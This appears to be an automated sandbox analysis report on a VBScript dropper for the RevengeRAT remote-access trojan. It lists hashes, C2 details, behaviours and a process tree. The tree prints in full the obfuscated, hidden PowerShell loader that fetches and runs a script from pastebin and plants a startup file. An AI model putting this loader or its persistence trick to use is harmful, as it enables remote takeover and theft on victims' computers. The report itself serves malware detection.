Analysis
-
max time kernel
174s -
max time network
175s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
19-02-2022 09:01
Static task
static1
Behavioral task
behavioral1
Sample
99b9e3b1e096a9e19fbf0eabc7d414045121dc10a2cd825eea5b2ee3465621ee.vbs
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
99b9e3b1e096a9e19fbf0eabc7d414045121dc10a2cd825eea5b2ee3465621ee.vbs
Resource
win10v2004-en-20220112
General
-
Target
99b9e3b1e096a9e19fbf0eabc7d414045121dc10a2cd825eea5b2ee3465621ee.vbs
-
Size
135KB
-
MD5
ee2fb6446ec3ac180286e25365b202b3
-
SHA1
6bd0bf5b4d0cea86979de7d5b78937c2ff4ee778
-
SHA256
99b9e3b1e096a9e19fbf0eabc7d414045121dc10a2cd825eea5b2ee3465621ee
-
SHA512
8e33769206cb7cb5a2655cdc18fba9087bdbfff0de4637d85d5837b36c529ddfb1b69c7424c7d18e38cb8ac106133c9cac2178abc50b8a119f7ae456bac2de27
Malware Config
Extracted
https://pastebin.com/raw/3mS4sRnV
Extracted
revengerat
Client
kimjoy.ddns.net:2021
RXQLV8XYTDNHNSA
Signatures
-
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 39 1680 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin32Bits89.vbs powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3564 set thread context of 1020 3564 powershell.exe InstallUtil.exe -
Drops file in Windows directory 3 IoCs
Processes:
svchost.exeTiWorker.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat svchost.exe File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe File opened for modification C:\Windows\WinSxS\pending.xml TiWorker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
MusNotifyIcon.exedescription ioc process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MusNotifyIcon.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz MusNotifyIcon.exe -
Modifies data under HKEY_USERS 49 IoCs
Processes:
svchost.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLanBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\KVFileExpirationTime = "132899115403423611" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.000000" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthID = "2" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PeerInfoCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "2.684536" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCacheHostBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LANConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\InternetConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadCount = "0" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DODownloadMode = "1" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyInternetBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\Geo_EndpointFullUri = "https://geo.prod.do.dsp.mp.microsoft.com/geo" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\GroupConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkUsageBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DownloadMode_BackCompat = "1" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyGroupBytes = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\BkDownloadRatePct = "45" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4152" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLinkLocalBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadCount = "0" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CacheSizeBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LinkLocalConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\FrDownloadRatePct = "90" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadPendingCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4364" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyLanBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrCnt = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkCnt = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadRatePct = "100" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadCount = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.035600" svchost.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 1680 powershell.exe 1680 powershell.exe 3564 powershell.exe 3564 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exeTiWorker.exedescription pid process Token: SeDebugPrivilege 1680 powershell.exe Token: SeDebugPrivilege 3564 powershell.exe Token: SeSecurityPrivilege 1340 TiWorker.exe Token: SeRestorePrivilege 1340 TiWorker.exe Token: SeBackupPrivilege 1340 TiWorker.exe Token: SeBackupPrivilege 1340 TiWorker.exe Token: SeRestorePrivilege 1340 TiWorker.exe Token: SeSecurityPrivilege 1340 TiWorker.exe Token: SeBackupPrivilege 1340 TiWorker.exe Token: SeRestorePrivilege 1340 TiWorker.exe Token: SeSecurityPrivilege 1340 TiWorker.exe Token: SeBackupPrivilege 1340 TiWorker.exe Token: SeRestorePrivilege 1340 TiWorker.exe Token: SeSecurityPrivilege 1340 TiWorker.exe Token: SeBackupPrivilege 1340 TiWorker.exe Token: SeRestorePrivilege 1340 TiWorker.exe Token: SeSecurityPrivilege 1340 TiWorker.exe Token: SeBackupPrivilege 1340 TiWorker.exe Token: SeRestorePrivilege 1340 TiWorker.exe Token: SeSecurityPrivilege 1340 TiWorker.exe Token: SeBackupPrivilege 1340 TiWorker.exe Token: SeRestorePrivilege 1340 TiWorker.exe Token: SeSecurityPrivilege 1340 TiWorker.exe Token: SeBackupPrivilege 1340 TiWorker.exe Token: SeRestorePrivilege 1340 TiWorker.exe Token: SeSecurityPrivilege 1340 TiWorker.exe Token: SeBackupPrivilege 1340 TiWorker.exe Token: SeRestorePrivilege 1340 TiWorker.exe Token: SeSecurityPrivilege 1340 TiWorker.exe Token: SeBackupPrivilege 1340 TiWorker.exe Token: SeRestorePrivilege 1340 TiWorker.exe Token: SeSecurityPrivilege 1340 TiWorker.exe Token: SeBackupPrivilege 1340 TiWorker.exe Token: SeRestorePrivilege 1340 TiWorker.exe Token: SeSecurityPrivilege 1340 TiWorker.exe Token: SeBackupPrivilege 1340 TiWorker.exe Token: SeRestorePrivilege 1340 TiWorker.exe Token: SeSecurityPrivilege 1340 TiWorker.exe Token: SeBackupPrivilege 1340 TiWorker.exe Token: SeRestorePrivilege 1340 TiWorker.exe Token: SeSecurityPrivilege 1340 TiWorker.exe Token: SeBackupPrivilege 1340 TiWorker.exe Token: SeRestorePrivilege 1340 TiWorker.exe Token: SeSecurityPrivilege 1340 TiWorker.exe Token: SeBackupPrivilege 1340 TiWorker.exe Token: SeRestorePrivilege 1340 TiWorker.exe Token: SeSecurityPrivilege 1340 TiWorker.exe Token: SeBackupPrivilege 1340 TiWorker.exe Token: SeRestorePrivilege 1340 TiWorker.exe Token: SeSecurityPrivilege 1340 TiWorker.exe Token: SeBackupPrivilege 1340 TiWorker.exe Token: SeRestorePrivilege 1340 TiWorker.exe Token: SeSecurityPrivilege 1340 TiWorker.exe Token: SeBackupPrivilege 1340 TiWorker.exe Token: SeRestorePrivilege 1340 TiWorker.exe Token: SeSecurityPrivilege 1340 TiWorker.exe Token: SeBackupPrivilege 1340 TiWorker.exe Token: SeRestorePrivilege 1340 TiWorker.exe Token: SeSecurityPrivilege 1340 TiWorker.exe Token: SeBackupPrivilege 1340 TiWorker.exe Token: SeRestorePrivilege 1340 TiWorker.exe Token: SeSecurityPrivilege 1340 TiWorker.exe Token: SeBackupPrivilege 1340 TiWorker.exe Token: SeRestorePrivilege 1340 TiWorker.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
WScript.exepowershell.exepowershell.execsc.exedescription pid process target process PID 2980 wrote to memory of 1680 2980 WScript.exe powershell.exe PID 2980 wrote to memory of 1680 2980 WScript.exe powershell.exe PID 1680 wrote to memory of 3564 1680 powershell.exe powershell.exe PID 1680 wrote to memory of 3564 1680 powershell.exe powershell.exe PID 3564 wrote to memory of 1460 3564 powershell.exe csc.exe PID 3564 wrote to memory of 1460 3564 powershell.exe csc.exe PID 1460 wrote to memory of 3420 1460 csc.exe cvtres.exe PID 1460 wrote to memory of 3420 1460 csc.exe cvtres.exe PID 3564 wrote to memory of 1020 3564 powershell.exe InstallUtil.exe PID 3564 wrote to memory of 1020 3564 powershell.exe InstallUtil.exe PID 3564 wrote to memory of 1020 3564 powershell.exe InstallUtil.exe PID 3564 wrote to memory of 1020 3564 powershell.exe InstallUtil.exe PID 3564 wrote to memory of 1020 3564 powershell.exe InstallUtil.exe PID 3564 wrote to memory of 1020 3564 powershell.exe InstallUtil.exe PID 3564 wrote to memory of 1020 3564 powershell.exe InstallUtil.exe PID 3564 wrote to memory of 1020 3564 powershell.exe InstallUtil.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\99b9e3b1e096a9e19fbf0eabc7d414045121dc10a2cd825eea5b2ee3465621ee.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WINDOWSTYLE HIDDEN -EXECUTIONPOLICY UNRESTRICTED -COMMAND IEX ([System.Text.Encoding]::UTF8.GetString(@(35,82,101,97,100,32,67,111,110,116,101,110,116,32,79,102,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,93,32,36,83,116,114,101,97,109,32,61,32,40,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,79,112,101,110,82,101,97,100,40,34,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,51,109,83,52,115,82,110,86,34,41,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,93,32,36,83,82,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,32,36,83,116,114,101,97,109,13,10,91,83,116,114,105,110,103,93,32,36,82,101,113,32,61,32,36,83,82,46,82,101,97,100,84,111,69,110,100,40,41,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,54,48,48,48,41,13,10,13,10,35,67,114,101,97,116,101,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,79,110,32,72,97,114,100,32,68,105,115,107,32,33,13,10,91,83,116,114,105,110,103,93,32,36,84,69,77,80,32,61,32,36,101,110,118,58,84,69,77,80,32,43,32,34,92,34,32,43,32,34,83,121,115,84,114,97,121,46,80,83,49,34,13,10,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,36,84,69,77,80,44,32,36,82,101,113,41,13,10,13,10,35,83,116,97,114,116,117,112,32,73,110,115,116,97,108,108,97,116,105,111,110,13,10,70,117,110,99,116,105,111,110,32,73,78,83,84,65,76,76,40,41,32,123,13,10,32,32,32,32,91,83,116,114,105,110,103,93,32,36,86,66,83,82,117,110,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,68,101,102,97,117,108,116,46,71,101,116,83,116,114,105,110,103,40,64,40,56,51,44,49,48,49,44,49,49,54,44,51,50,44,55,57,44,57,56,44,49,48,54,44,51,50,44,54,49,44,51,50,44,54,55,44,49,49,52,44,49,48,49,44,57,55,44,49,49,54,44,49,48,49,44,55,57,44,57,56,44,49,48,54,44,49,48,49,44,57,57,44,49,49,54,44,52,48,44,51,52,44,56,55,44,56,51,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,44,52,54,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,52,44,52,49,44,49,51,44,49,48,44,55,57,44,57,56,44,49,48,54,44,52,54,44,56,50,44,49,49,55,44,49,49,48,44,51,50,44,51,52,44,56,48,44,49,49,49,44,49,49,57,44,49,48,49,44,49,49,52,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,50,44,52,53,44,54,57,44,49,50,48,44,49,48,49,44,57,57,44,49,49,55,44,49,49,54,44,49,48,53,44,49,49,49,44,49,49,48,44,56,48,44,49,49,49,44,49,48,56,44,49,48,53,44,57,57,44,49,50,49,44,51,50,44,56,50,44,49,48,49,44,49,48,57,44,49,49,49,44,49,49,54,44,49,48,49,44,56,51,44,49,48,53,44,49,48,51,44,49,49,48,44,49,48,49,44,49,48,48,44,51,50,44,52,53,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,51,50,44,51,52,44,51,50,44,51,56,44,51,50,44,51,52,44,51,55,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,56,48,44,57,55,44,49,49,54,44,49,48,52,44,51,55,44,51,52,44,52,52,44,51,50,44,52,56,41,41,13,10,32,32,32,32,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,40,91,83,121,115,116,101,109,46,69,110,118,105,114,111,110,109,101,110,116,93,58,58,71,101,116,70,111,108,100,101,114,80,97,116,104,40,55,41,32,43,32,34,92,83,121,115,116,101,109,76,111,103,105,110,51,50,66,105,116,115,56,57,46,118,98,115,34,41,44,32,36,86,66,83,82,117,110,46,82,101,112,108,97,99,101,40,34,37,70,105,108,101,80,97,116,104,37,34,44,32,36,84,69,77,80,41,41,13,10,125,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,49,48,48,48,41,13,10,13,10,35,82,117,110,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,73,78,83,84,65,76,76,13,10,73,69,88,32,34,80,111,119,101,114,83,104,101,108,108,46,101,120,101,32,45,87,105,110,100,111,119,83,116,121,108,101,32,72,105,100,100,101,110,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32,36,84,69,77,80,34)))2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File C:\Users\Admin\AppData\Local\Temp\SysTray.PS13⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qd3uf0oy\qd3uf0oy.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB077.tmp" "c:\Users\Admin\AppData\Local\Temp\qd3uf0oy\CSC7AA40A77B20242269F51E85EE1EE2F95.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"4⤵
-
C:\Windows\system32\MusNotifyIcon.exe%systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 131⤵
- Checks processor information in registry
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
c163ab439d3c5ab9abff81272c463c19
SHA13f87e709ce5e2b8a4eed5dd1c9f4252549b0b94f
SHA2564dbf858a84ae2a2ff8368e49a188c61d41606da2ce8aece245f70f787029ff5a
SHA512473f1ee75bcd06a2f53b3b4605a4805c9b1fca5b3b87080d9708308a426cb4b8e81543a982f9c94d2fb5a1101f264e0533663cb471035e83e1abf4126d91ec79
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
9623954de06799ed53f9f40a5a74fc70
SHA172b5934105dcaf591b42c885b029a4a0256d8e7b
SHA256b9d649868bb3cd32ed1b052c7028dfa413cf50bd02e06dda401f89fd96e31a9c
SHA5122087d1525ba56fc6c713ca18e9ca63b8838307aeadf24f67908697785072fe394d2472bfa0a5eb3d80e09645540befc9671f2723d5caef976dc0e268451ab21c
-
C:\Users\Admin\AppData\Local\Temp\RESB077.tmpMD5
8b16177d13efdcfdbd771711e15ed1a8
SHA141232d1a185dcd5cba8e66621c20d6fa8a41e046
SHA256a1e16dcbbae38c1cb6666cabc0f4833cddd495fac43d2d7665243bcc83bb0e55
SHA512a35631e33dafa0d2a296591e7e1c0d22252561b4d676b1a55a8dee60ae71361684c5b58009042e591cc1b6864481557243c794bafa33ddf2685d19610ec12028
-
C:\Users\Admin\AppData\Local\Temp\SysTray.PS1MD5
2bd198d265d67c9f4021eca5bb341900
SHA1e3559a0d69e988877ce69d66b69cb41619521272
SHA256721e44289afb034e90a67fb97eb5efd4d469bc95ba9863f16aed5e5909c76c61
SHA512fa00e4b59b41ccbe865d342815001262323db96f99ebd30b1a5728111f9959c2e2775a5f279652649505ad23afe7a5551a705c650b985829cd2690f92f50e8f4
-
C:\Users\Admin\AppData\Local\Temp\qd3uf0oy\qd3uf0oy.dllMD5
f09a7c9a8eec8ac4a2295b88ca0ba7e0
SHA10ac6cce375bb53818a4ddba018fc0296de440043
SHA2567239c1c4fb39c957bef18bc5375792cab6b4215cdb3696f5cda85f9b56568a12
SHA51251764e8faeb83fbda73ff9833ee84aeb07eb4c688d5b2de2ea9f18491bb6954ccb2dd010c49783b63001ee19058fb3377bd6854eb87af707bf23e88541b6d3d7
-
\??\c:\Users\Admin\AppData\Local\Temp\qd3uf0oy\CSC7AA40A77B20242269F51E85EE1EE2F95.TMPMD5
4b63037af1071af8799e05c25b21ed30
SHA1076792ad48918fa0991b19d7d7c385100fa96f02
SHA256e71506e10d76cd5f50b1d809a76fdef49ee4356bc982df4e6a915183d35ccb21
SHA512029a815745d08acd040b478ca7e80afb3c65980d91248d0d02c2f4f9d8093a9a177feacdad64986bb0ece7c5aadbcc24611a31993ac8a792584e6745b0bb9044
-
\??\c:\Users\Admin\AppData\Local\Temp\qd3uf0oy\qd3uf0oy.0.csMD5
e03b1e7ba7f1a53a7e10c0fd9049f437
SHA13bb851a42717eeb588eb7deadfcd04c571c15f41
SHA2563ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427
SHA512a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f
-
\??\c:\Users\Admin\AppData\Local\Temp\qd3uf0oy\qd3uf0oy.cmdlineMD5
1bd0a6414db5d09cf698f1a8ffe96489
SHA1bcedd72309b67ff35141c3d33e8df7356b466d1d
SHA25650249e12d6a0c8c1b364110502f97903050896624b0aba6b6e6a8d26fe5eef0e
SHA512bac229a1d54e26c174779c8b261eb54134d2f30756a64b350644ea26bff522ff8e10029c5fed3784f747fc0d4f99951c016098b39a8046cd188c62d95d939650
-
memory/1020-164-0x0000000005590000-0x0000000005B34000-memory.dmpFilesize
5.6MB
-
memory/1020-163-0x0000000074D9E000-0x0000000074D9F000-memory.dmpFilesize
4KB
-
memory/1020-158-0x0000000000400000-0x000000000040A000-memory.dmpFilesize
40KB
-
memory/1680-136-0x000002506A9B3000-0x000002506A9B5000-memory.dmpFilesize
8KB
-
memory/1680-137-0x000002506ABC0000-0x000002506ABE2000-memory.dmpFilesize
136KB
-
memory/1680-130-0x00007FFA6C363000-0x00007FFA6C365000-memory.dmpFilesize
8KB
-
memory/1680-140-0x000002506A9B6000-0x000002506A9B8000-memory.dmpFilesize
8KB
-
memory/1680-135-0x000002506A9B0000-0x000002506A9B2000-memory.dmpFilesize
8KB
-
memory/3564-152-0x000001A7EC720000-0x000001A7EC796000-memory.dmpFilesize
472KB
-
memory/3564-151-0x000001A7EC256000-0x000001A7EC258000-memory.dmpFilesize
8KB
-
memory/3564-150-0x000001A7EC253000-0x000001A7EC255000-memory.dmpFilesize
8KB
-
memory/3564-149-0x000001A7EC250000-0x000001A7EC252000-memory.dmpFilesize
8KB
-
memory/3564-148-0x00007FFA6C363000-0x00007FFA6C365000-memory.dmpFilesize
8KB